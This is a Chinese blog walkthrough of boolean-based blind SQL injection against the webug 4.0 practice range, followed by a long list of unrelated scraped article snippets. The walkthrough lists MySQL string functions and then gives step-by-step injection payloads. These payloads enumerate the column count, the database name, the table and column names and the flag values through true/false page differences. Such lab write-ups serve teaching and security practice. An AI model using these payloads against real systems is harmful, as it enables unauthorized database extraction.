Stephen Wolf
Stephen Wolf

webug4.0—布尔注入

盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。本次主要讲解的是基于布尔的盲注。

Length()函数 返回字符串的长度

sleep(n):将程序挂起一段时间 n为n秒

if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句

left(database(),n)  database() 数据库名称 left()函数表示截取数据库左侧n个字符

substr(a,b,c)   从字符串a的b位置开始截取c个字符,当b为负数时截取位置是从字符串a右端向左数b个字符

mid(a,b,c)    从字符串a的b位置开始截取c个字符,c为非必需若省略返回剩余文本

ord()与ascii()   这两个函数都是将字符转化成ascii值

limit i,n第一个参数:从i开始查 ; 第二个参数:查n条

IFNULL(exp1,exp2) 如果exp1不为null,返回exp1否则返回exp2

cast(exp as data_type)as之前是待处理数据,后面是要转换的类型。有时还有要求eg:CAST(‘12.5’ AS decimal(10,2)) 10代表所有数字位数限制为10 ,2表示小数点后两位 故结果为12.50 如果前面type换成int 则运行错误 。另精度和小数位数的默认值分别是18与0,decimal下 浮点数不说明的情况下会出来整数。

1. 打开靶场,发现url参数id为1,尝试修改为2 发现回显hello,修改为3 发现正常无回显 我们好像意识到了什么。。。

2.老一套探测sql注入

正常页面

1.加 ' 发现内容变了

2.加 ' and 1=1 %23 发现内容没变

3.加 ' and 1=2 %23 发现内容变了

4.发现注入点 且 并没有报错 不是显错注入

3. 探测列数

192.168.72.136/control/sqlinject/bool_injection.php?id=1' order by 1 %23   #页面没变
192.168.72.136/control/sqlinject/bool_injection.php?id=1' order by 2 %23   #页面没变
192.168.72.136/control/sqlinject/bool_injection.php?id=1' order by 3 %23   #页面变化 说明是两列
4.判断数据库名称的长度(二分法思维)

1' and length(database())>10 %23    页面改变
1' and length(database())>5 %23    页面改变
1' and length(database())>3 %23    页面没变
1' and length(database())>4 %23    页面没变
确定数据库名称长度为5

5.判断数据库名称的字符

http://localhost/control/sqlinject/bool_injection.php?id=1’ and left(database(),2)>'we' %23

正确时内容不变,错误时内容变了

webug4.0—布尔注入_第1张图片
开始猜数据库名,一步步猜出数据库名为webug,替换数字时需要加一个测试字符

找出数据库的名称为:webug

6.猜解数据库表个数:

1' and (select count(table_name) from information_schema.tables where table_schema=database())>10 %23    页面改变
1' and (select count(table_name) from information_schema.tables where table_schema=database())>5 %23    页面不变
1' and (select count(table_name) from information_schema.tables where table_schema=database())>6 %23    页面不变
1' and (select count(table_name) from information_schema.tables where table_schema=database())=7 %23    页面不变
      7个表

7.猜解表名:

1.首先猜解第一个表名长度:

1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>10 %23    页面改变
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>5 %23    页面不变
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>8 %23    页面不变
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 %23    页面不变
确定第一表的长度为9

以此类推,修改substr的第二个参数,判断第二个表长度为8, 再类推 到第4个表使用这个语句

http://192.168.72.136/control/sqlinject/bool_injection.php?id=1%27%20and%20length(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%203,1),1))=4%20%23
发现了这个表的名称长度为4 可能是我们要的flag(后来发现竟然不是)  如果你需要别的 就需要用下面爆破flag的方法爆破其他数据表名称

2.判断表的位置和名称长度之后判断表的具体名称:

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))>88 %23    页面不变
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))>120 %23    页面改变
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))>100 %23    页面不变
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))>105 %23    页面改变
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))=102 %23    页面不变
发现第一个字符的ascii值为102 查询字符为f 依次类推得到表名flag

8. 猜解字段名:

1.依然是猜解字段名个数

1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='flag')>10 %23    页面改变
1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='flag')>5 %23    页面改变
1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='flag' limit 1,1)=4 %23    页面不变
发现字段的个数为2

2.猜解各字段名的位数

猜解第一个字段的长度:

1' and length(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),1))>5 %23    页面改变
1' and length(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),1))=2%23    页面不变
发现第一个字段长度是2 可能不是我们要的‘flag’字段

猜解第二个字段的长度

1' and length(substr((select column_name from information_schema.columns where table_name='flag' limit 1,1),1))>5 %23    页面改变
1' and length(substr((select column_name from information_schema.columns where table_name='flag' limit 1,1),1))=4 %23    页面不变
 发现第二个字段的长度为4 可能使我们需要的字段 爆破一下这个字段的名字

1' and ascii(substr((select column_name from information_schema.columns where table_name='flag' limit 1,1),1,1))>88 %23    页面不变
1' and ascii(substr((select column_name from information_schema.columns where table_name='flag' limit 1,1),1,1))>120 %23    页面改变
1' and ascii(substr((select column_name from information_schema.columns where table_name='flag' limit 1,1),1,1))=102 %23    页面不变
发现第二个字段的第一个字符ascii值为102 依次类推 发现字段名也是flag

9.猜解字段值:

依然是依次猜解字段值得长度 以及字段的值

1.猜解字段值长度:

1' and length(substr((select flag from flag limit 0,1),1))>10 %23    页面不变
1' and length(substr((select flag from flag limit 0,1),1))>20 %23    页面改变
1' and length(substr((select flag from flag limit 0,1),1))=16 %23    页面不变
字段值长度为16

2.猜解字段值具体值:

1' and ascii(substr((select flag from flag limit 0,1),1,1))>88 %23    页面不变
1' and ascii(substr((select flag from flag limit 0,1),1,1))>120 %23    页面改变
1' and ascii(substr((select flag from flag limit 0,1),1,1))>104 %23    页面改变
1' and ascii(substr((select flag from flag limit 0,1),1,1))>96 %23    页面不变
1' and ascii(substr((select flag from flag limit 0,1),1,1))=100 %23    页面不变
探测出来字段值第一位为d 依次类推 改变substr第二个参数 得到flag为 dfafdasfafdsadfa

10.提交flag 。。。 你没有看错 flag错误。

11.只能去探测其他表:

最后探测出来真正flag在env_list表中 行吧 方法已经放在这了

最后放出flag :fdsafsdfa

你可能感兴趣的:(webug,4.0)

  • 绝招曝光!3小时高效利用ChatGPT写出精彩论文 kkai人工智能 chatgpt人工智能ai学习媒体
    在这份指南中,我将深入解析如何利用ChatGPT4.0的高级功能,指导整个学术研究和写作过程。从初步探索研究主题,到撰写结构严谨的学术论文,我将一步步展示如何在每个环节中有效运用ChatGPT。如果您还未使用PLUS版本,可以参考相关教程。**初步探索与主题的确定**起初,我处于庞大的知识领域中,寻找一个可深入研究的领域。ChatGPT如同灯塔,通过深入分析最新研究趋势和领域热点,帮助我在广阔的学
  • yolov5>onnx>ncnn>apk 图像处理大大大大大牛啊 opencv实战代码讲解yoloonnxncnn安卓
    一.yolov5pt模型转onnx条件:colabnotebookyolov51.安装环境!pipinstallonnx>=1.7.0#forONNXexport!pipinstallcoremltools==4.0#forCoreMLexport!pipinstallonnx-simplifier2.修改common.py在classFocus下面
  • 2018-08-16【Swift 4.1】 关于Swift4.0以后调用MJExtension无法模型转换问题 码农happy
    1、本人使用swift4.1,弄了一晚上才弄好,结果还是一个小问题真是尴尬,要在model中每个属性前面加上@objcimportUIKitclassUserModel:NSObject{@objcvardix=String()}letdic=["dix":"ffffff"]asNSDictionaryletmodel=UserModel.mj_object(withKeyValues:dic)!
  • Cloud Native Weekly | 华为云抢先发布Redis5.0,红帽宣布收购混合云提供商 weixin_34302561 数据库devops大数据
    1——华为云抢先发布Redis5.02——DigitalOceanK8s服务正式上线3——红帽宣布收购混合云提供商NooBaa4——微软发布多项AzureKubernetes服务更新1华为云抢先发布Redis5.012月17日,华为云在DCS2.0的基础上,快人一步,抢先推出了新的Redis5.0产品,这是一个崭新的突破。目前国内在缓存领域的发展普遍停留在Redis4.0阶段,华为云率先发布了Re
  • Swift4.0: 利用图形上下文画基础图? Dayu大鱼
    步骤:开启图片上下文获取上下文配置上下文3.1填充颜色cgColor3.2填充尺寸从图形上下文中获取图片关闭上下文返回图片importFoundationimportUIKitextensionUIImage{///画一个白色背景的图片classfuncimageWithWhiteBackGroundColor()->UIImage{//开始图形上下文UIGraphicsBeginImageCon
  • 车载以太网之SOME/IP IT_码农 车载以太网车载以太网SOME/IP
    整体介绍SOME/IP(全称为:Scalableservice-OrientedMiddlewarEoverIP),是运行在车载以太网协议栈基础之上的中间件,或者也可以称为应用层软件。发展历程AUTOSAR4.0-完成宝马SOME/IP消息的初步集成;AUTOSAR4.1-支持SOME/IP-SD及其发布/订阅功能;AUTOSAR4.2-添加transformer用于序列化以及其他相关优化;AUT
  • JMeter 4.0 mac上配置代理录制脚本 GoGooGooo
    添加线程组添加http代理服务器设置mac网页代理设置http代理服务器启动,访问指定网站,去线程组里查看拦截的请求
  • C# Tuple、ValueTuple 語衣 C#知识补充c#
    栏目总目录TupleTuple是C#4.0引入的一个新特性,主要用于存储一个固定数量的元素序列,且这些元素可以具有不同的类型。Tuple是一种轻量级的数据结构,非常适合用于临时存储数据,而无需定义完整的类或结构体。优点简便性:可以快速创建一个包含多个不同类型数据的对象,而无需定义新的类或结构体。灵活性:元素数量和类型在编译时确定,但可以在不同上下文中重复使用不同元素的Tuple。缺点性能:作为引用
  • 工业智能网关在工业生产中的核心作用-天拓四方 weixin_36369259
    随着工业4.0时代的到来,物联网(IoT)和智能制造技术日益成熟,工业智能网关作为连接工业设备与物联网系统的关键设备,正逐步成为现代工业生产不可或缺的重要组成部分。本文将详细探讨工业智能网关在工业生产中的多重作用,揭示其如何助力企业实现数字化转型与智能化管理。一、工业智能网关概述工业智能网关,也称为工业物联网网关、工业边缘计算网关等,是一种专为工业环境设计的网络连接设备。它集成了数据采集、传输、协
  • 边缘计算网关在机床数据采集中的应用-天拓四方 各自安好吧 边缘计算人工智能
    随着工业4.0和智能制造的快速发展,机床作为制造业的核心设备,其数据采集与分析对于提升生产效率、保证产品质量、优化加工过程具有重要意义。传统的数据采集方式存在数据传输速度慢、实时性差、数据处理能力有限等问题。为了解决这些问题,边缘计算网关在机床数据采集领域的应用逐渐受到关注。本文将详细探讨边缘计算网关在机床数据采集中的应用,并分析其带来的优势。一、边缘计算网关概述边缘计算网关是一种集成了数据采集、
  • 工业数据采集网关的作用-天拓四方 北京天拓四方 边缘计算物联网iot
    工业数据采集网关是一种专门用于采集、处理、传输工业现场数据的设备。它能够实时收集来自各种传感器、仪表和设备的数据,并通过网络将这些数据传输到云端或数据中心。同时,数据采集网关还具备数据清洗、转换和压缩等功能,确保数据的质量和传输效率。随着工业4.0时代的来临,数字化转型已成为工业发展的必然趋势。工业数据采集网关作为连接物理世界与数字世界的桥梁,其在工业数字化转型中发挥着至关重要的作用。本文将详细探
  • Android SurfaceTexture和GLSurfaceView做Camera预览 小小攻城师 AndroidSurfaceTextureGLSurfaceViewSurfaceTextureopenGopenGL
    GLSurfaceView是OpenGL中的一个类,也是可以预览Camera的,而且在预览Camera上有其独到之处。独到之处在哪?当使用Surfaceview无能为力、痛不欲生时就只有使用GLSurfaceView了,它能够真正做到让Camera的数据和显示分离,所以搞明白了这个,像Camera只开预览不显示这都是小菜,妥妥的。Android4.0的自带Camera源码是用SurfaceView
  • SQL Server 6.5 配置使用要点 rc_cdeoo_com sqlserverserversecuritymanager网络协议sql
    SQLServer6.5在安装使用时的默认配置并不能带来系统性能的最大优化,某些使用方法没有具体的说明,在具体应用过程中感觉非常不便。下面结合本人在使用中的心得,就SQLServer6.5的一些安装使用方法作了简要介绍,各位可以针对自己的情况进行修改。1.安装中的要点安装时要求系统使用WindowsNTServer4.0,并且加装SP4。a)网络安装过程中选择网络时,安装程序默认不使用TCP/IP
  • 四、webpack4.0 - tapable Razas WEBPACK4webpack4.0
    一、tapable介绍webpack中插件的时候,需要用到tapable。新建一个项目WEBPACK-Tapable。初始化package.json:npminit-y安装:npminstalltapable--savetapable是一个包。二、tapable三、AsyncParralleHook四、AsyncSeriesHook五、AsyncSeriesWaterfall
  • source insight4.0中文乱码解决方法 鹿屿二向箔 c语言stm32keilmdk
    Sourceinsight是强大、顺手的代码编辑器,它几乎支持所有的语言,包括:C,C++,C#,HTML等等,能够自动创建并维护它自己高性能的符号数据库,包括函数、全局变量、结构、类和工程源文件里定义的其它类型的符号,对于大工程的源码阅读非常方便。但是因为是国外软件,对中文支持不是很好,很多电脑安装使用都会出现注释乱码问题,很让人抓狂。网上很多人遇到类似的问题,也有很多解决方式,也有很多“终极解
  • 全面的弹出框提示框插件资源指南 BOBO爱吃菠萝
    本文还有配套的精品资源,点击获取简介:在IT领域,用户界面设计中的弹出框和提示框是关键元素,它们能够有效传达信息与引导用户。本资源汇集了多种类型的弹出框和提示框插件,如artDialog、ymprompt4.0、thickbox、poshytip和colortips,提供给开发者在网页或应用程序中实现多样化交互体验的工具。这些插件各有特色,包括自定义样式、拖拽功能、全屏展示、定位提示以及色彩展示等
  • zabbix4.0安装+grafana数据展示——cent7.3 运维实战课程 grafanazabbixlinux运维
    zabbix4.0安装+grafana数据展示——cent7.3如果对运维课程感兴趣,可以在b站上搜索我的账号:运维实战课程,可以关注我,学习更多免费的运维实战技术视频Zabbix_server:192.168.43.166被监控端:192.168.43.xxlnmp工作过程:用户请求nginx,当请求静态页面,nginx直接返回给用户,当请求动态页面,如php程序文件,nginx会调用php-f
  • 对话腾讯陈仁健:聊一聊腾讯PAG动效解决方案的生产能力与开源情况 LiveVideoStack_ 影音探索视频编解码开源实时音视频
    “PAG到目前为止已经迭代了5年,经历了四个大版本。最新的PAG4.0版本在今年年初开源…”PAG由腾讯研发,是一套完整的动效工作流解决方案,提供从AE(AdobeAfterEffects)导出插件,到桌面预览工具PAGViewer,再到各端的跨平台渲染SDK。能够一键将设计师在AE中制作的动效内容导出成素材文件,并快速上线应用于几乎所有的主流平台。观其发展,可以看出是人们对视频内容生产的效率与丰
  • Android动态破解微信本地数据库(EnMicroMsg.db) 寰宇软件 Android原生
    版权声明:本文为博主原创文章,遵循CC4.0BY-SA版权协议,转载请附上原文出处链接和本声明。本文链接:https://blog.csdn.net/njweiyukun/article/details/54024442最近在公司接了一个任务,需要在几百台手机上安装一个app,目的是获取微信里面的通讯录,并且定时的把他发送到我们的服务器上。当时依次尝试的如下几个方案:1.通过群控,将好友截图发送到
  • SpringBoot自动装配中的Condition机制 hai40587 springbootjava后端
    SpringBoot自动装配中的Condition机制在SpringBoot中,自动装配(Auto-Configuration)是一个核心特性,它极大地简化了Spring应用的配置过程。自动装配通过条件判断(Condition)机制,根据应用的环境和依赖来决定是否创建和配置Bean。这一机制在Spring4.0中引入,主要通过@Conditional注解及其一系列变体实现。本文将详细探讨Sprin
  • 【C-实践】文件服务器(4.0) 轩轶子 #C语言实践c语言服务器开发语言
    文件服务器1.0文件服务器2.0文件服务器3.0概述使用了tcp+epoll+线程池+生产者消费者模型,实现文件服务器有两个进程,主进程负责接收退出信号用来退出整个程序;子进程负责管理线程池、客户端连接以及线程池的退出子进程中的主线程生产任务,其他子线程消费任务与3.0的区别是线程池的退出方式,在收到退出信号后,通知线程池让它们自己退出。3.0是暴力退出线程池,4.0是温和退出线程池在任务队列中新
  • Gemini AI 与 ChatGPT:哪个更适合为我策划婚礼? AI科研视界 chatgpt人工智能
    我在六月订婚后,一心想着婚礼钟声,但在看到这些婚礼场地报价后,更像是警铃声响起。“叮咚”已经被重新混音成“哗啦啦”——我需要帮助。我甚至不知道如何开始计划婚礼。第一步是什么?我需要优先考虑什么?哪些任务紧迫——哪些可以先放一两年?我决定请一位AI助手来帮忙。更进一步,我觉得看看哪款聊天机器人——GeminiAdvanced还是ChatGPTPlus(即ChatGPT4.0)——是更好的婚礼策划师会
  • 【HarmonyOS 4.0】@ohos.events.emitter (Emitter) 卿卿qing 华为HarmonyOS4.0
    B页面需要感知到A页面的点击事件,进而触发B页面的刷新逻辑,类似这种公共的事件通知,就可通过emitter来实现。导入emitter模块发布和订阅都需要导入emitter模块。importemitterfrom'@ohos.events.emitter'emitter.emit发送一个事件到事件队列。发送自定义事件。emitter.emit(event:InnerEvent1,data?:Even
  • 吐血整理 ChatGPT 3.5/4.0 新手使用手册~ 【2024.09.04 更新】 aiwisland chatgpt人工智能aiAI编程AI写作
    以前我也是通过官网使用,但是经常被封号,就非常不方便,后来有朋友推荐国内工具,用了一阵之后,发现:稳定方便,用着也挺好的。最新的GPT-4o、4omini,可搭配使用~1、最新模型科普:现在人工智能很强大,聊聊天、写论文、搞翻译、写代码、写文案、审合同、情感陪伴等,真是无所不能~本来以为ChatGPT早已普及了,没想到仍然有很多小伙伴还没用上。。。其实使用很简单,可以选通义、智谱、Deepseek
  • 金属3D打印与压铸模具的融合:创新引领制造新纪元 看侃侃 制造
    步入工业4.0的新纪元,3D打印技术犹如一股强劲的东风,为制造业的转型升级插上了智慧的翅膀。作为铸造领域的核心,压铸模具在工业领域扮演着不可或缺的角色,其重要性不言而喻。然而,面对日益多样化的压铸件需求,传统模具制造技术的局限性逐渐显现,这时,3D打印技术的引入为压铸模具行业带来了革命性的变化。3D打印,这一增材制造技术,通过逐层堆叠材料的方式,直接将数字设计转化为实体零件。它打破了传统减材或等材
  • Django中遇到的问题(持续更新) Hi,你好啊 Pythondjangopython后端
    问题一:url导入不成功导入:fromdjango.conf.urlsimporturl报错:ImportError:cannotimportname'url'from'django.conf.urls'原因:Django在4.0以上版本将其废弃。解决办法:#使用新的函数进行替代fromdjango.urlsimportre_pathasurl
  • c++利用ado操作excel(.xls)或(.xlsx)文件 三无人员9630
    //ConnectionString=_T("Provider=Microsoft.Jet.OLEDB.4.0;DataSource=");ConnectionString=_T("Provider=Microsoft.ACE.OLEDB.12.0;DataSource=");ConnectionString+="E:\\周报\\222.xlsx";//excelfilename//Connect
  • 记录-小程序720°VR(跳转H5页面实现) 久违的小技巧 小程序小程序vrjavascript
    全景浏览提前准备1拍照支架/照片合成软件(KolorAutopanoGiga4.0)或者全景相机2pannellum(pannellum是一个轻量级、免费和开源的Web全景查看器。它使用HTML5、CSS3、JavaScript和WebGL构建,没有插件。)3H5页面引入pannellum.js/css文件,swiper/jquery文件(因为需要在全景图底部显示可切换图片,与dom操作/ajax
  • 详解神策数据银行对公业务数字化运营解决方案 汪功校 大数据
    4.0时代,数字银行的转变主要体现在系统支持、数据管理、客户感知三个维度,希望通过改善业务体系、整合业务数据,从而为客户提供更好的服务。当前,多数银行已经拥有了较好的数据基础,但却并没有形成数据全生命周期的闭环,导致价值化数据占比较低,无法作为关键生产要素为企业注入新动能。在此背景下,数据全生命周期的闭环体系成为银行数字化运营的引擎,发挥数据中台和业务中台相辅相成、相互支撑的作用,构建以客户数据为
  • jmeter 获取全部响应_Jmeter 记录请求和响应信息 weixin_39603609 jmeter获取全部响应
    Jmeter默认是不记录请求和响应的具体信息的,不过依照这一篇的方法,可以记录下响应数据。然而,仍然没有办法记录请求的数据。本文将探索如何做到记录请求数据到文件。本文使用的Jmeter是4.0版本对象及用途SamplerResult和prev对象都可以用于记录请求-响应中一系列信息,也就是在ViewResultsTree中观察到的信息。它们的接口是相同的,但是所属的元件有不同。@SamplerRe
  • 矩阵求逆(JAVA)利用伴随矩阵 qiuwanchi 利用伴随矩阵求逆矩阵
    package gaodai.matrix; import gaodai.determinant.DeterminantCalculation; import java.util.ArrayList; import java.util.List; import java.util.Scanner; /** * 矩阵求逆(利用伴随矩阵) * @author 邱万迟
  • 单例(Singleton)模式 aoyouzi 单例模式Singleton
    3.1           概述 如果要保证系统里一个类最多只能存在一个实例时,我们就需要单例模式。这种情况在我们应用中经常碰到,例如缓存池,数据库连接池,线程池,一些应用服务实例等。在多线程环境中,为了保证实例的唯一性其实并不简单,这章将和读者一起探讨如何实现单例模式。 3.2
  • [开源与自主研发]就算可以轻易获得外部技术支持,自己也必须研发 comsci 开源
          现在国内有大量的信息技术产品,都是通过盗版,免费下载,开源,附送等方式从国外的开发者那里获得的。。。。。。        虽然这种情况带来了国内信息产业的短暂繁荣,也促进了电子商务和互联网产业的快速发展,但是实际上,我们应该清醒的看到,这些产业的核心力量是被国外的
  • 页面有两个frame,怎样点击一个的链接改变另一个的内容 Array_06 UIXHTML
    <a src="地址"  targets="这里写你要操作的Frame的名字" />搜索 然后你点击连接以后你的新页面就会显示在你设置的Frame名字的框那里 targerts="",就是你要填写目标的显示页面位置 ===================== 例如: <frame src=&
  • Struts2实现单个/多个文件上传和下载 oloz 文件上传struts
    struts2单文件上传:     步骤01:jsp页面 <!--在进行文件上传时,表单提交方式一定要是post的方式,因为文件上传时二进制文件可能会很大,还有就是enctype属性,这个属性一定要写成multipart/form-data,不然就会以二进制文本上传到服务器端-->   <form action="fileUplo
  • 推荐10个在线logo设计网站 362217990 logo
    在线设计Logo网站。 1、http://flickr.nosv.org(这个太简单) 2、http://www.logomaker.com/?source=1.5770.1 3、http://www.simwebsol.com/ImageTool 4、http://www.logogenerator.com/logo.php?nal=1&tpl_catlist[]=2 5、ht
  • jsp上传文件 香水浓 jspfileupload
    1. jsp上传 Notice: 1. form表单 method 属性必须设置为 POST 方法 ,不能使用 GET 方法 2. form表单 enctype 属性需要设置为 multipart/form-data 3. form表单 action 属性需要设置为提交到后台处理文件上传的jsp文件地址或者servlet地址。例如 uploadFile.jsp 程序文件用来处理上传的文
  • 我的架构经验系列文章 - 前端架构 agevs JavaScriptWeb框架UIjQuer
    框架层面:近几年前端发展很快,前端之所以叫前端因为前端是已经可以独立成为一种职业了,js也不再是十年前的玩具了,以前富客户端RIA的应用可能会用flash/flex或是silverlight,现在可以使用js来完成大部分的功能,因此js作为一门前端的支撑语言也不仅仅是进行的简单的编码,越来越多框架性的东西出现了。越来越多的开发模式转变为后端只是吐json的数据源,而前端做所有UI的事情。MVCMV
  • android ksoap2 中把XML(DataSet) 当做参数传递 aijuans android
    我的android app中需要发送webservice ,于是我使用了 ksop2 进行发送,在测试过程中不是很顺利,不能正常工作.我的web service 请求格式如下     [html]  view plain copy   <Envelope xmlns="http://schemas.
  • 使用Spring进行统一日志管理 + 统一异常管理 baalwolf spring
    统一日志和异常管理配置好后,SSH项目中,代码以往散落的log.info() 和 try..catch..finally 再也不见踪影! 统一日志异常实现类: [java]  view plain copy   package com.pilelot.web.util;      impor
  • Android SDK 国内镜像 BigBird2012 android sdk
    一、镜像地址: 1、东软信息学院的 Android SDK 镜像,比配置代理下载快多了。 配置地址, http://mirrors.neusoft.edu.cn/configurations.we#android 2、北京化工大学的: IPV4:ubuntu.buct.edu.cn  IPV4:ubuntu.buct.cn IPV6:ubuntu.buct6.edu.cn
  • HTML无害化和Sanitize模块 bijian1013 JavaScriptAngularJSLinkySanitize
    一.ng-bind-html、ng-bind-html-unsafe         AngularJS非常注重安全方面的问题,它会尽一切可能把大多数攻击手段最小化。其中一个攻击手段是向你的web页面里注入不安全的HTML,然后利用它触发跨站攻击或者注入攻击。         考虑这样一个例子,假设我们有一个变量存
  • [Maven学习笔记二]Maven命令 bit1129 maven
    mvn compile compile编译命令将src/main/java和src/main/resources中的代码和配置文件编译到target/classes中,不会对src/test/java中的测试类进行编译 MVN编译使用 maven-resources-plugin:2.6:resources maven-compiler-plugin:2.5.1:compile &nbs
  • 【Java命令二】jhat bit1129 Java命令
    jhat用于分析使用jmap dump的文件,,可以将堆中的对象以html的形式显示出来,包括对象的数量,大小等等,并支持对象查询语言。 jhat默认开启监听端口7000的HTTP服务,jhat是Java Heap Analysis Tool的缩写 1. 用法: [hadoop@hadoop bin]$ jhat -help Usage: jhat [-stack <bool&g
  • JBoss 5.1.0 GA:Error installing to Instantiated: name=AttachmentStore state=Desc ronin47
    进到类似目录 server/default/conf/bootstrap,打开文件 profile.xml找到: Xml代码<bean    name="AttachmentStore"  class="org.jboss.system.server.profileservice.repository.AbstractAtta
  • 写给初学者的6条网页设计安全配色指南 brotherlamp UIui自学ui视频ui教程ui资料
    网页设计中最基本的原则之一是,不管你花多长时间创造一个华丽的设计,其最终的角色都是这场秀中真正的明星——内容的衬托     我仍然清楚地记得我最早的一次美术课,那时我还是一个小小的、对凡事都充满渴望的孩子,我摆放出一大堆漂亮的彩色颜料。我仍然记得当我第一次看到原色与另一种颜色混合变成第二种颜色时的那种兴奋,并且我想,既然两种颜色能创造出一种全新的美丽色彩,那所有颜色
  • 有一个数组,每次从中间随机取一个,然后放回去,当所有的元素都被取过,返回总共的取的次数。写一个函数实现。复杂度是什么。 bylijinnan java算法面试
    import java.util.Random; import java.util.Set; import java.util.TreeSet; /** * http://weibo.com/1915548291/z7HtOF4sx * #面试题#有一个数组,每次从中间随机取一个,然后放回去,当所有的元素都被取过,返回总共的取的次数。 * 写一个函数实现。复杂度是什么
  • struts2获得request、session、application方式 chiangfai application
    1、与Servlet API解耦的访问方式。 a.Struts2对HttpServletRequest、HttpSession、ServletContext进行了封装,构造了三个Map对象来替代这三种对象要获取这三个Map对象,使用ActionContext类。 ----->   package pro.action; import java.util.Map; imp
  • 改变python的默认语言设置 chenchao051 python
    import sys sys.getdefaultencoding()  可以测试出默认语言,要改变的话,需要在python lib的site-packages文件夹下新建: sitecustomize.py, 这个文件比较特殊,会在python启动时来加载,所以就可以在里面写上: import sys sys.setdefaultencoding('utf-8') &n
  • mysql导入数据load data infile用法 daizj mysql导入数据
    我们常常导入数据!mysql有一个高效导入方法,那就是load data infile 下面来看案例说明 基本语法: load data  [low_priority] [local] infile 'file_name txt' [replace | ignore] into table tbl_name [fields [terminated by't'] [OPTI
  • phpexcel导入excel表到数据库简单入门示例 dcj3sjt126com PHPExcel
    跟导出相对应的,同一个数据表,也是将phpexcel类放在class目录下,将Excel表格中的内容读取出来放到数据库中 <?php error_reporting(E_ALL); set_time_limit(0); ?> <html> <head> <meta http-equiv="Content-Type"
  • 22岁到72岁的男人对女人的要求 dcj3sjt126com
    22岁男人对女人的要求是:一,美丽,二,性感,三,有份具品味的职业,四,极有耐性,善解人意,五,该聪明的时候聪明,六,作小鸟依人状时尽量自然,七,怎样穿都好看,八,懂得适当地撒娇,九,虽作惊喜反应,但看起来自然,十,上了床就是个无条件荡妇。 32岁的男人对女人的要求,略作修定,是:一,入得厨房,进得睡房,二,不必服侍皇太后,三,不介意浪漫蜡烛配盒饭,四,听多过说,五,不再傻笑,六,懂得独
  • Spring和HIbernate对DDM设计的支持 e200702084 DAO设计模式springHibernate领域模型
    A:数据访问对象     DAO和资源库在领域驱动设计中都很重要。DAO是关系型数据库和应用之间的契约。它封装了Web应用中的数据库CRUD操作细节。另一方面,资源库是一个独立的抽象,它与DAO进行交互,并提供到领域模型的“业务接口”。    资源库使用领域的通用语言,处理所有必要的DAO,并使用领域理解的语言提供对领域模型的数据访问服务。
  • NoSql 数据库的特性比较 geeksun NoSQL
    Redis 是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。目前由VMware主持开发工作。   1. 数据模型 作为Key-value型数据库,Redis也提供了键(Key)和值(Value)的映射关系。除了常规的数值或字符串,Redis的键值还可以是以下形式之一: Lists (列表) Sets
  • 使用 Nginx Upload Module 实现上传文件功能 hongtoushizi nginx
    转载自: http://www.tuicool.com/wx/aUrAzm   普通网站在实现文件上传功能的时候,一般是使用Python,Java等后端程序实现,比较麻烦。Nginx有一个Upload模块,可以非常简单的实现文件上传功能。此模块的原理是先把用户上传的文件保存到临时文件,然后在交由后台页面处理,并且把文件的原名,上传后的名称,文件类型,文件大小set到页面。下
  • spring-boot-web-ui及thymeleaf基本使用 jishiweili springthymeleaf
    视图控制层代码demo如下:   @Controller @RequestMapping("/") public class MessageController { private final MessageRepository messageRepository; @Autowired public MessageController(Mes
  • 数据源架构模式之活动记录 home198979 PHP架构活动记录数据映射
    hello!架构 一、概念 活动记录(Active Record):一个对象,它包装数据库表或视图中某一行,封装数据库访问,并在这些数据上增加了领域逻辑。 对象既有数据又有行为。活动记录使用直截了当的方法,把数据访问逻辑置于领域对象中。   二、实现简单活动记录 活动记录在php许多框架中都有应用,如cakephp。 <?php /** * 行数据入口类 *
  • Linux Shell脚本之自动修改IP pda158 linuxcentosDebian脚本
    作为一名 Linux SA,日常运维中很多地方都会用到脚本,而服务器的ip一般采用静态ip或者MAC绑定,当然后者比较操作起来相对繁琐,而前者我们可以设置主机名、ip信息、网关等配置。修改成特定的主机名在维护和管理方面也比较方便。如下脚本用途为:修改ip和主机名等相关信息,可以根据实际需求修改,举一反三! #!/bin/sh #auto Change ip netmask ga
  • 开发环境搭建 独浮云 eclipsejdktomcat
           最近在开发过程中,经常出现MyEclipse内存溢出等错误,需要重启的情况,好麻烦。对于一般的JAVA+TOMCAT项目开发,其实没有必要使用重量级的MyEclipse,使用eclipse就足够了。尤其是开发机器硬件配置一般的人。         &n
  • 操作日期和时间的工具类 vipbooks 工具类
       大家好啊,好久没有来这里发文章了,今天来逛逛,分享一篇刚写不久的操作日期和时间的工具类,希望对大家有所帮助。 /* * @(#)DataFormatUtils.java 2010-10-10 * * Copyright 2010 BianJing,All rights reserved. */ package test; impor
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他